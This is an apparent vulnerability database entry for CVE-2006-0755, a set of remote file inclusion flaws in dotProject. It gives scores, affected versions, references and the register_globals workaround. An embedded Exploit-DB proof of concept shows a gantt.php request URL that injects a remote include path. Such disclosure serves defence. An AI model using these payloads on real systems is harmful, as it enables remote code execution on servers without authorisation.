CVE-2006-0755
CVSS 5.1
Published: 2006-02-17 21:02:00
Revised: 2011-03-07 21:30:46

[Original] ** DISPUTED ** Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary commands via the baseDir parameter in (1) db_adodb.php, (2) db_connect.php, (3) session.php, (4) vw_usr_roles.php, (5) calendar.php, (6) date_format.php, and (7) tasks/gantt.php; and the dPconfig[root_dir] parameter in (8) projects/gantt.php, (9) gantt2.php, and (10) vw_files.php. NOTE: the vendor disputes this issue, stating that the product documentation clearly recommends that the system administrator disable register_globals, and that the check.php script warns against this setting. Also, the vendor says that the protection.php/siteurl vector is incorrect because protection.php does not exist in the product.


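[CNNVD] Dotproject multiple remote file inclusion vulnerabilities (CNNVD-200602-266)

        dotproject is a beta-level, web-based project management and tracking tool written in PHP+MySql.
        The dotproject implementation contains multiple input validation vulnerabilities that a remote attacker may exploit to execute arbitrary commands on the system.
        The protection.php script in dotproject does not properly validate user input in the siteurl parameter, so an attacker can include a remote PHP file through eval() and execute arbitrary PHP code. There are also several path disclosure vulnerabilities. When accessed directly with the parameter baseDir=foobar, almost all files in /db/ may produce exploitable PHP errors. If the /doc/ directory has not been removed (the default configuration), the following two files can be accessed and leak system information:
        1) /docs/phpinfo.php - phpinfo() file
        2) /docs/check.php - information about the installed dotProject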

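- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]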

- CPE (affected platforms and products)

cpe:/a:dotproject:dotproject:2.0
cpe:/a:dotproject:dotproject:2.0.1

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0755
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0755
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-266
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/24738
(UNKNOWN)  XF  dotproject-multiple-basedir-file-include(24738)
http://www.vupen.com/english/advisories/2006/0604
(UNKNOWN)  VUPEN  ADV-2006-0604
http://www.securityfocus.com/bid/16648
(UNKNOWN)  BID  16648
http://www.securityfocus.com/archive/1/archive/1/424957/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060214 dotproject <= 2.0.1 remote code execution
http://www.securityfocus.com/archive/1/425285/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Re: dotproject <= 2.0.1 remote code execution
http://www.osvdb.org/23219
(UNKNOWN)  OSVDB  23219
http://www.osvdb.org/23218
(UNKNOWN)  OSVDB  23218
http://www.osvdb.org/23217
(UNKNOWN)  OSVDB  23217
http://www.osvdb.org/23216
(UNKNOWN)  OSVDB  23216
http://www.osvdb.org/23215
(UNKNOWN)  OSVDB  23215
http://www.osvdb.org/23214
(UNKNOWN)  OSVDB  23214
http://www.osvdb.org/23213
(UNKNOWN)  OSVDB  23213
http://www.osvdb.org/23212
(UNKNOWN)  OSVDB  23212
http://www.osvdb.org/23211
(UNKNOWN)  OSVDB  23211
http://www.osvdb.org/23210
(UNKNOWN)  OSVDB  23210
http://www.osvdb.org/23209
(UNKNOWN)  OSVDB  23209
http://secunia.com/advisories/18879
(VENDOR_ADVISORY)  SECUNIA  18879

- Vulnerability information

Dotproject multiple remote file inclusion vulnerabilities
Medium risk  Input validation
2006-02-17 00:00:00 2006-03-02 00:00:00
Remote

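- Advisories and patches

        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version.
        http://www.dotproject.net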

- Vulnerability information (22708)

dotProject <= 2.1.6 Remote File Inclusion Vulnerability (EDBID:22708)
php webapps
2012-11-14 Verified
0 dun
:::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2012-11-13                              ]
 #################################################################
 #  [ dotProject <= 2.1.6 ] Remote File Inclusion Vulnerability  #
 #################################################################
 #
 # Script: "PHP web-based project management framework that includes modules for companies,
 #          projects, tasks (with Gantt charts), forums, files, calendar, contacts, tickets/helpdesk,
 #          multi-language support, user/module permissions and themes"
 #
 # Vendor:   http://www.dotproject.net/
 # Download: http://sourceforge.net/projects/dotproject/files/dotproject/dotProject%20Version%202.1.6/
 #
 #################################################################
 #
 # [ Remote File Inclusion ] ( allow_url_include = On; register_globals = On; )
 #
 # File: dotproject/modules/projectdesigner/gantt.php ( line: 8 ):
 # ..cut..
 # include ($dPconfig['root_dir'].'/lib/jpgraph/src/jpgraph.php');
 # ..cut..
 #
 # Vuln: http://localhost/dotproject/modules/projectdesigner/gantt.php?dPconfig[root_dir]=http://localhost/info.txt?
 #
 ### [ dun / 2012 ] #############################################		

- Vulnerability information

23210
dotProject /includes/db_adodb.php baseDir Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

dotProject contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /includes/db_adodb.php not properly sanitizing user input supplied to the 'baseDir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- Timeline

2006-02-14 2006-01-24
Unknown Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: turn the register_globals PHP option to 'off'.
